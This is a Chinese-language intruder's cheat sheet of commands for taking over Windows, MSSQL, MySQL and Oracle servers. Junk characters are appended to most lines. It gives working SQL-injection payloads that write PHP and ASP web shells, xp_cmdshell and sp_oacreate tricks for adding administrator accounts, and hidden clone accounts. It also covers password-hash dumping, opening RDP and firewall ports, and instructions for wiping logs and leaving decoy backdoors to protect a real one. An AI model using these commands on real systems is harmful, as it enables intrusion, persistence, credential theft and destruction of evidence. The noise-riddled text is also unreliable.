6 ]7 ]; r0 D7 ?3 a q
1.net user administrator /passwordreq:no* I9 ~3 n4 v( u% x2 i% N; ?
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
# J8 ?4 M% N* @2.比较巧妙的建克隆号的步骤8 ~+ P- V6 z1 u/ ]% u
先建一个user的用户+ O% ^. ^* [! t$ D" e* ^
然后导出注册表。然后在计算机管理里删掉/ H# ~7 X4 l# |$ o( |5 M8 N; K
在导入,在添加为管理员组2 n# o: ]5 { b3 Q7 V0 D3 |
3.查radmin密码
- B5 W$ }& G4 n& m$ S4 X/ f" Greg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg0 f8 o. M, v+ A, x8 ^' e0 E
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]$ B. b( l7 ~) d) F0 `8 S: z
建立一个"services.exe"的项
: R, {& f# P8 o _再在其下面建立(字符串值)
; W# w5 ]" R9 S7 a% N0 W键值为mu ma的全路径1 r P D# S+ s" S
5.runas /user:guest cmd
5 I' U1 ~$ Z$ Z7 K8 l( t测试用户权限!& J6 B0 ?; p& {* U# R. y( L p3 D& m) ]
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
3 c( ]& l( T4 z7.入侵后漏洞修补、痕迹清理,后门置放:
0 r# k/ }: H6 S d基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门% Z8 }( M! Z9 E8 k+ r q
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
1 U4 O3 w; V: {/ h# q4 E3 P5 L( d" n( @- T' z$ a' G! H9 U
for example% Z, s. b! Y+ Q
8 [. s5 d* V6 ^ |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
9 b; E* C( f! b; a# r1 s: E! w7 w3 ~! o- b; i& g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'# R6 M4 z: b3 s& O* A
& e! Z: x5 Q* t( ~1 |9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
) q |& d) o% ~- u# F如果要启用的话就必须把他加到高级用户模式& U6 l+ F" F" ?; f# R! \( A
可以直接在注入点那里直接注入
5 z5 ~" [' ?8 z- x) e1 lid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--) C, U" U; f* R2 r6 }8 V; @0 t- K
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
U! Y4 }+ o' w; l5 S" _, x或者* l' V$ k+ b/ K* j j
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
) Y! v! K+ B0 x! v4 ~来恢复cmdshell。
; Y# j% q) a# x* J1 D. q* H& g" @ W, K0 M2 G' F. u5 b
分析器* S5 K5 x1 b# {, y, k9 F1 l& T3 ?
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--6 ~4 p. j. l/ i0 f0 i
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")- b2 x' X0 t5 |8 o0 S
10.xp_cmdshell新的恢复办法
W4 T* Y# h, Y0 ixp_cmdshell新的恢复办法
4 L! ]' N1 _' \6 ?2 a1 G扩展储存过程被删除以后可以有很简单的办法恢复:+ q; R. J7 L, F- l) p3 Z
删除
! Z- r& d/ g/ `) X! udrop procedure sp_addextendedproc
2 X$ r- P& {" z: E) B, {0 ]drop procedure sp_oacreate2 @* e1 m( Z6 s% k
exec sp_dropextendedproc 'xp_cmdshell'
- I5 E/ t3 G0 n* g3 }' _+ a m! a3 c5 V
恢复* o! ]. J" Z9 D$ l
dbcc addextendedproc ("sp_oacreate","odsole70.dll")' T, M) y% P8 p* B7 { K
dbcc addextendedproc ("xp_cmdshell","xplog70.dll"), K2 n/ h2 M {# j
. ]4 D1 e2 e: ?2 k这样可以直接恢复,不用去管sp_addextendedproc是不是存在- K3 o3 ]0 [' i9 \6 o9 y
! ~5 A R% @- q# D5 n/ N-----------------------------6 K% T5 T5 I( I8 F7 `. Z
/ f9 o" K, V. V# l3 d8 W: P* K删除扩展存储过过程xp_cmdshell的语句:- u5 N9 l$ L3 ?; I6 w5 i
exec sp_dropextendedproc 'xp_cmdshell'
( k( g" X r- ?6 [: R! c6 M8 ^- _& p$ p _4 p
恢复cmdshell的sql语句
! q4 L, v: }. Cexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
) c! }* j1 p+ g1 {2 f
& L7 `8 K+ l4 d6 g
3 T& d% L# ~: ^$ x; \0 z8 u开启cmdshell的sql语句
" M% q4 y+ \2 ]% A$ P: L+ `7 T$ }! E2 m6 J* b0 {6 N
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'# O. k6 h1 i! P% ~. d" b
% _( ^% v1 V9 W9 W6 j) S, u判断存储扩展是否存在
/ O* l/ F' i& [# fselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
0 u% u' J1 D$ X- i" K, H# s返回结果为1就ok
3 c! C& h1 J) s! @! u& t. u, _( ^3 J
9 C9 |" M+ s! _恢复xp_cmdshell
9 q% Z% P; H- {7 r+ B9 E4 aexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'0 l; T7 k6 U1 G- k
返回结果为1就ok
* E* h9 l" e! e( w
$ A2 J. h4 ? W7 W/ c& s0 x否则上传xplog7.0.dll
& G( @, |5 f" M% gexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
4 g! ]* w, E* @: k p
$ c0 j& D$ C- C9 q4 P" P( S堵上cmdshell的sql语句
4 u9 l2 R A" V# asp_dropextendedproc "xp_cmdshel* }1 g5 h; m. I, M* F2 q5 s5 Y
-------------------------
# D8 i/ S* f! ]4 t B清除3389的登录记录用一条系统自带的命令:7 v1 g3 x# W" {+ v
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
7 U0 p# X+ O3 m" t! c* y4 _" P3 K: J$ v$ c+ ]) J! q" m
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
- c4 Y- C' M q ^% Q3 q8 Q' v在 mysql里查看当前用户的权限" x, h2 }4 y+ l$ d* `+ _
show grants for
* u3 g5 T8 K: G0 [4 r% p2 t& m1 ^; k* q, F- L1 {( u! n
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
8 |* Y5 P* C4 E' W* V$ Q$ }7 g: p2 Q8 a ]
; Y7 L6 J1 I2 w4 r6 _5 s1 W; [$ A6 OCreate USER 'itpro'@'%' IDENTIFIED BY '123';
% m' I% `# z: W: \! P% B; Q' K4 k8 l
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
# M4 I& ~+ M7 q" F, m
; _. E( V/ K- ~6 {3 Q; v9 d. AMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 00 m* `/ M" |8 e6 s$ b
# a. x y! k6 s8 Y4 I- o E& J
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
# n+ q+ _6 A' ~6 o6 ?' i8 w P& D' Y0 m( H/ W) B! ?1 j
搞完事记得删除脚印哟。2 z" S( U3 J1 q$ J- @+ ?# {
, b! }& i$ O$ R7 q" mDrop USER 'itpro'@'%';% t$ _4 Z: b6 X
' ~+ C, Q: J5 E3 D; VDrop DATABASE IF EXISTS `itpro` ;
7 @ A! e- C; X4 I
6 o) b8 ^8 I" w2 o8 P* d! Z当前用户获取system权限7 W( D8 o5 u, i- Q9 x- C
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact3 q' W/ B4 r% h ~4 O
sc start SuperCMD* P3 ?' N2 a+ ]$ a* v2 e
程序代码
2 U5 U7 y& H+ d: E& h2 }' O<SCRIPT LANGUAGE="VBScript">, P; b& \% u( O9 \. C, K
set wsnetwork=CreateObject("WSCRIPT.NETWORK")6 p( o3 D) F. y7 Z
os="WinNT://"&wsnetwork.ComputerName
) I) ?; W. t i, Q8 N, P+ o: BSet ob=GetObject(os)
) G/ t, x& _/ x9 W K7 USet oe=GetObject(os&"/Administrators,group")
' ~& p# I6 u, }8 j7 p( @; W! ]% i# kSet od=ob.Create("user","nosec")
2 S9 t! u/ l8 x# ?( J: uod.SetPassword "123456abc!@#"
4 |9 p/ w5 n K% O- X2 E9 _od.SetInfo9 \* ^5 }7 {# ]* O& I5 h) M% ?
Set of=GetObject(os&"/nosec",user)7 v+ A" i+ q2 V
oe.add os&"/nosec"
- ~) T9 Z# D! \9 P</Script>, }2 W% h8 m7 B
<script language=javascript>window.close();</script>5 b/ i! `& n3 w( n/ @% f( j; B
5 V9 i1 K: m! Z5 u+ `) M6 @
) Q( j) N, X- P+ M
- P6 @/ z) s$ ?" P8 s+ \- P, O: g
$ X' G( ~# j9 I; k突破验证码限制入后台拿shell
+ U4 R* S! W0 f+ O# h) L* M5 ^程序代码" p. t% \7 T1 V) {. q! R5 N7 n
REGEDIT4
6 }* \. L6 u2 K3 w% t9 h[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
8 h* \+ x' F5 i"BlockXBM"=dword:00000000 c; V, p0 {6 s {' b$ M
- y8 `) {. H# H2 H! c
保存为code.reg,导入注册表,重器IE
; E% [; S+ i9 V, w6 s就可以了# S2 g) t/ n0 R" }* t7 y
union写马* r0 z) Q1 C9 T# J& M
程序代码
; i) g5 w. m0 ]; V' @www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
& j1 ?2 P% a+ o8 }. g$ B/ B5 `7 q# ^: J$ D; b5 T
应用在dedecms注射漏洞上,无后台写马2 b+ W9 N3 ?' {/ S% w! \
dedecms后台,无文件管理器,没有outfile权限的时候4 i n, C+ m/ {1 y! u4 z4 s S) T
在插件管理-病毒扫描里
% J. F8 y$ ^ B l写一句话进include/config_hand.php里# h- L3 @, }5 \0 Y& j0 V" O
程序代码( Y1 V' V3 `. a
>';?><?php @eval($_POST[cmd]);?>
3 n6 n4 F" k, v' h# B; @
' e- R9 h; ~: w& `+ U& P% U9 P+ ^& D& l7 m) C2 m
如上格式* F) R8 @8 w4 J+ P; K! D9 F6 [0 A
5 r( \3 y# d- Q C2 r! s. _
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
. z) c( W- A( @# A; }程序代码4 m9 w; p* K. z; e. e
select username,password from dba_users; x1 F7 G# s5 e' P8 h
% s! N6 Q \7 }# b }- e
2 l+ w4 r) @" omysql远程连接用户
3 Y- x7 [" f) \% u程序代码+ G9 K# J# R4 ]5 m: C4 N
1 t6 A- D7 x: w d7 Y' A
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';. H* O- Y4 Q \ {0 v( k) ^
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION4 Z$ x( J ]9 y7 {% s" _( U" ]$ \
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0- t+ k) ?1 E1 D& F9 H9 p
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 {( I% x5 g A
1 z! |! f* i' ~" H! K( E1 \7 q- {2 J% V D# g% h" U
7 t$ ]' @& k: ~; x. X( D3 P
8 K/ J$ x) a! m( vecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0$ [% Y* t# u* s, C9 I
! x6 _6 C$ J+ p K. ~, E1.查询终端端口' r3 s/ Z- C* s# I, V! G
$ B6 d! l2 L; V% a N3 [6 cxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber1 B0 c7 [( w) j$ g5 }5 R) w2 H
) w9 N% s* Q% `! }0 A! E
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
Q$ ~6 f, z' {type tsp.reg/ M+ @% T- d2 N
& ?8 _+ ~' ?, |! s% {
2.开启XP&2003终端服务
! [( [7 c, u4 l9 M1 ?* G1 {+ |+ O. E% H
/ }0 k( O' w, p d) w
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3 J( |8 \+ |& h; c$ [- ~" L& v1 o+ d* W
# q' @9 M/ \7 w5 S" `6 v5 n3 MREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f7 s: L# t% u9 J0 b( E) i, r7 _
H3 j9 A' s* N: D) {6 Y: O) ?
3.更改终端端口为20008(0x4E28)7 K2 ?) `7 P8 t$ Z& s3 L# P
' d7 q+ R' D$ C" @. ?8 GREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f% S3 \6 J0 M# m5 c9 W A; D: P' G
. e2 n+ y% z: C, G, X
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
% h2 t6 v X$ |
% y3 Y2 T4 z& D9 h" g4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
6 r8 e" Y/ |" f* M, N3 [) n2 t) ]& @2 ~3 S' N
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f- Q, A9 |1 G5 T1 Y7 N
! T6 o) e' s) e1 _, w) |( I
) _1 D, t! b: X b6 I; z
5.开启Win2000的终端,端口为3389(需重启)
% z& S1 C q. b, O' x
9 J) K4 p4 m6 O: n* ]7 vecho Windows Registry Editor Version 5.00 >2000.reg
4 t* C6 G8 U$ |4 _0 Techo. >>2000.reg+ E4 m6 F! {! M. X5 u2 Y" f
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 1 `! z7 Y! H8 p: I* p4 ]
echo "Enabled"="0" >>2000.reg
+ G& Y9 p8 ?6 Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg + a/ e4 ~7 \" f* Y: X
echo "ShutdownWithoutLogon"="0" >>2000.reg " W) g& c* J. }/ n7 u2 e7 W7 C8 w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
; k, G2 j5 E2 j- s5 cecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
, g7 F+ d* _, ?4 P- K8 _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
( u2 U, a0 p1 Gecho "TSEnabled"=dword:00000001 >>2000.reg 9 T9 E4 n5 h G: h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
; h" Q- h* Y6 ~4 R8 W5 T! recho "Start"=dword:00000002 >>2000.reg 5 k6 u" I" b, r8 z% X$ g; S4 n- X
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
" A1 j1 W; X& U7 D! o+ C; ~+ J+ Zecho "Start"=dword:00000002 >>2000.reg 4 d6 n( A" F; f; p/ C
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 2 n$ r& N' R2 N2 V$ U9 X) }
echo "Hotkey"="1" >>2000.reg
( A. j) g' \+ V f9 Q9 M1 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
7 ^1 ]- m: P% L* V W% vecho "ortNumber"=dword:00000D3D >>2000.reg
+ c% m: x4 a' J; decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
* M" o! |5 ]0 M* recho "ortNumber"=dword:00000D3D >>2000.reg8 N- x0 `% Q% ^- p+ Z+ J- H/ j
; [$ x) a9 P+ B" o- G6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
2 ?2 j; O8 m/ |$ {' K5 b" L; b4 n1 z4 b% M8 ~' N4 c
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf% r+ Y/ h/ Z+ d; T# e% a4 _
(set inf=InstallHinfSection DefaultInstall)
0 F/ g0 z, t2 n+ N2 K' L. X; [" ?echo signature=$chicago$ >> restart.inf
6 F2 N6 w: \0 _; ?1 @6 k# gecho [defaultinstall] >> restart.inf
. F6 n. G {3 Z/ ^2 O/ crundll32 setupapi,%inf% 1 %temp%\restart.inf, ^* {& C5 B% o% |2 [( N6 n
" @) F8 J, `1 z9 ~9 e3 x
8 W+ S" t0 B- p
7.禁用TCP/IP端口筛选 (需重启)
, b7 Y. P0 M9 k/ Z
) N5 J+ R% I, b! K. `) _5 [REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f0 s2 p' Y5 x" a3 c
! w7 {- Z# `5 C' W8.终端超出最大连接数时可用下面的命令来连接
/ U" m% H' m, |4 @ ?5 Y4 A1 t1 j6 K5 E! B8 b, C, K. j% |+ L
mstsc /v:ip:3389 /console
; e2 j/ x' c, g- C* s; o& j' {7 A! r) @, K2 J) y' M' K' C2 [
9.调整NTFS分区权限
& X* `: W3 r$ ]# R
( T" U9 P( M- r/ B$ l X+ a. f4 mcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
, d; m5 G# f8 |0 Q& @) I2 j; h$ I* _# x6 m0 q
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)' _0 i2 Y# ^" Y4 Q; C* ^8 I
9 x3 w) Z3 P$ m! M6 f# x
------------------------------------------------------
0 q3 U2 t: G" s: P: ~8 p3389.vbs
p# C' y# b& ?3 u/ gOn Error Resume Next% d5 b% @! H9 S; w/ x
const HKEY_LOCAL_MACHINE = &H80000002" M& a6 ^" D7 m, I
strComputer = "."
' ~8 e7 o& q% d9 h* T9 _; iSet StdOut = WScript.StdOut
0 s! L: b1 ^- W8 q7 TSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
^: x, }! ?1 q, EstrComputer & "\root\default:StdRegProv")4 D6 i3 c& j. I; w& ^/ G
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
+ T# V/ G( ~5 `* I8 A/ V8 [oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath7 S$ U1 {8 o( @/ i
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"1 h$ [0 [" z: A: u& ]9 Z
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
% |5 @ d5 z) K$ @' o! ^+ MstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"% O* b- X* y% ]& ~5 L% W
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
) ?- e \% A8 J7 C( mstrValueName = "fDenyTSConnections"3 X9 E& ^. z' @& v- {: b
dwValue = 0
" X3 E- m+ y9 o( B. M) a( Soreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue8 F% [3 F7 W5 o4 z x, O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
( T: o' |4 w! i& S3 I NstrValueName = "ortNumber"
; _' m3 o; D. m- {) m; hdwValue = 3389
b8 `* u; k/ N8 N: y' a, u- uoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
6 M7 w) o, I% \$ Q9 qstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp") x9 O3 x7 Z T: O: R
strValueName = "ortNumber"
3 @9 O! p9 O% [4 t. K5 q( HdwValue = 3389
' k0 y" z1 f7 M5 Loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue: ^# E4 P" y _
Set R = CreateObject("WScript.Shell")
5 y2 ~ S! |3 Q# bR.run("Shutdown.exe -f -r -t 0")
' o ~2 \3 @# t2 Q( D3 b
9 n, b+ {) {8 C" R' r* B# \2 h删除awgina.dll的注册表键值$ V+ W; w; A+ e! [6 [
程序代码
( T8 L) t! A1 Z& [% [0 k$ p
9 Q$ o! j/ ^5 l9 g/ \9 g5 D4 Freg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
1 t; w8 n& m# }+ D4 T- e6 k ^1 ?6 P( x' x
1 M& M0 A0 l( j5 k2 }8 X1 Q: U }9 _) u, E2 z
" F2 h! A3 d6 l% i, u4 R- h
程序代码5 F7 w2 l- ^% }( P% {$ Y
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
) y; O8 M9 X. |, ?8 k$ C
, T2 k c1 d1 ?0 ]- P9 @' q设置为1,关闭LM Hash/ G# c$ a# W# @# G M8 D
* P1 ~+ z* r. ~2 i
数据库安全:入侵Oracle数据库常用操作命令
1 L/ {3 ]. i1 |3 o7 P; E U" F最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。) Q, x" i( d+ L
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
' r7 E% T8 ]. k5 a. |$ c1 B4 x2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;; r; L7 C4 }+ D& Q6 n" i q
3、SQL>connect / as sysdba ;(as sysoper)或
7 K0 q- ]1 j i% {connect internal/oracle AS SYSDBA ;(scott/tiger)& k" m; e( n, k' E+ b$ X( G9 s+ @
conn sys/change_on_install as sysdba;
: U. s/ k( [: v+ p" N6 c4、SQL>startup; 启动数据库实例0 c$ z1 r2 N6 Q M
5、查看当前的所有数据库: select * from v$database;
! S, s. h: ~! l) m6 [5 N7 X8 A( Zselect name from v$database;
! f+ O0 x# Y4 W& |. b0 L% N; O7 a6、desc v$databases; 查看数据库结构字段
4 s9 I) U# P1 W, [7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:' M6 p0 L5 G6 \ Q! M2 g1 R
SQL>select * from V_$PWFILE_USERS;
6 r/ Z9 N# m7 K, w* l! dShow user;查看当前数据库连接用户$ \+ r, |! g# W/ R5 b
8、进入test数据库:database test;: j* l& u( ]# g
9、查看所有的数据库实例:select * from v$instance;7 I4 J& n" w3 v9 `
如:ora9i9 E; W: u' U( {4 V
10、查看当前库的所有数据表:* L W$ u5 o: m0 g) v* M
SQL> select TABLE_NAME from all_tables;
3 k1 x, G5 O" h) ?+ Wselect * from all_tables;
/ f9 B1 ?: ^$ h, T& E) f8 p) gSQL> select table_name from all_tables where table_name like '%u%';
' I+ W$ d# M2 L! PTABLE_NAME
Z1 P2 B3 H3 W( o$ s" k0 f------------------------------
; }) z* E1 j1 U, `: w. D4 ~_default_auditing_options_
, W! o( ~6 k- i) D$ j5 x/ A4 V11、查看表结构:desc all_tables;3 W' J5 q% v. j6 E5 D, g
12、显示CQI.T_BBS_XUSER的所有字段结构:
/ U2 `% G5 l5 d9 ^6 n( Jdesc CQI.T_BBS_XUSER;
# y* o0 S$ Y# o; ^( F3 x1 @! {. b13、获得CQI.T_BBS_XUSER表中的记录: l3 g- u/ d f/ |; w. [- {
select * from CQI.T_BBS_XUSER;
0 d1 m5 R* t, h, |, ?14、增加数据库用户:(test11/test)
( C! z! [2 v$ q- B' tcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
9 b# U+ x7 D. m# e# u/ `: k" a15、用户授权:& ^2 h+ {: o% E& R( P
grant connect,resource,dba to test11;4 {7 G3 ^3 `+ u, \1 L; n
grant sysdba to test11;- b( ^9 n% N# V+ q
commit;0 t* l" j- s& B% X# ?9 }" E
16、更改数据库用户的密码:(将sys与system的密码改为test.)
( ]9 a0 \! J; m) Z% m3 Nalter user sys indentified by test;; ?) W9 z( D; [. U% F* W
alter user system indentified by test;
+ }) E$ M) U& v3 U) w3 J: i/ x
applicationContext-util.xml
6 t \; s" ?4 japplicationContext.xml6 V% q6 u. n7 {4 I L- P3 k
struts-config.xml1 G$ v0 q9 `2 R1 O( u7 I p7 E
web.xml# j! h5 n! W$ L* {. g! g
server.xml
2 I5 ^0 v2 W' j" ptomcat-users.xml: k3 f1 a9 x1 Y" K9 n' w! O& O
hibernate.cfg.xml" n4 z1 Y4 z4 b. L5 W
database_pool_config.xml
! @8 T9 G) U2 O5 M/ r4 n, R( K. a6 Z
0 ?/ W/ r# W1 ?% \) e" ]9 |
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置2 [' m c p! y: f, k
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
O" Q5 Q( W) ?1 s, Q2 _( K\WEB-INF\struts-config.xml 文件目录结构2 D& y1 l) y& ]" J/ ]5 e4 o
' B; p) }; x0 s6 k* j+ {
spring.properties 里边包含hibernate.cfg.xml的名称
& p V% z. J5 Z
6 _! ] D% l5 ^ M% N8 M5 [( }$ x4 L B2 x' n7 v
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml0 C; I8 k0 i& j. _/ T+ j/ \# a
/ l; j; N) Y" |5 W7 h5 N
如果都找不到 那就看看class文件吧。。" N! j, k7 _9 q; H. D
9 p0 u9 L- [; H测试1:) F: o' F, _" ?& ]
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t17 W; r/ ~5 F1 L; k; P
: Y4 T5 m R; U! c' _. y# G) b
测试2:
) V! f8 r& m* {& o* J0 Z8 n
1 C1 B0 r" L3 b, bcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
7 B2 o: |5 F- f- E# w9 N" Z5 l. j
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
! a' V3 k$ z. i1 {: ] P& A1 E8 t5 ]# C' ?5 S2 b) L4 }. Y
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
2 a4 T6 U2 `- A3 G M& U. E( a1 `, f, R* O5 n" C
查看虚拟机中的共享文件:" y- d& ^5 I0 N r; X
在虚拟机中的cmd中执行( s9 r5 \6 l3 r
\\.host\Shared Folders; b! Y* p: A3 ]- u
8 E2 B) b) Z9 {6 C+ @4 b' ucmdshell下找终端的技巧
3 `. F* b2 p1 t; S5 l找终端:
- s' ]4 u/ m3 H; v7 w6 Y第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
* t# z. P- k, l6 F* ~ 而终端所对应的服务名为:TermService ! b0 s! t; s8 d" A
第二步:用netstat -ano命令,列出所有端口对应的PID值!
( e9 W6 i* u' Q- ^! ^, ^- _ 找到PID值所对应的端口( J- h9 x5 ~' w2 i) D" }6 V
: C' s( q" `3 _
查询sql server 2005中的密码hash4 D1 K6 I- V6 N8 c; Z$ \9 R
SELECT password_hash FROM sys.sql_logins where name='sa'$ l& h8 Y6 c# S, ^
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a! H3 a. `& z4 B5 O# ^
access中导出shell* s" l& E/ U3 v j
* l: Y m/ c. M7 \& V( U l* g& W' B* n中文版本操作系统中针对mysql添加用户完整代码:
X4 w1 W3 ^7 |/ v. ]! F3 Z" C4 u' ?' W3 V3 P% j' E5 e- W, {
use test;
& ~9 W, Y! F0 E ycreate table a (cmd text);
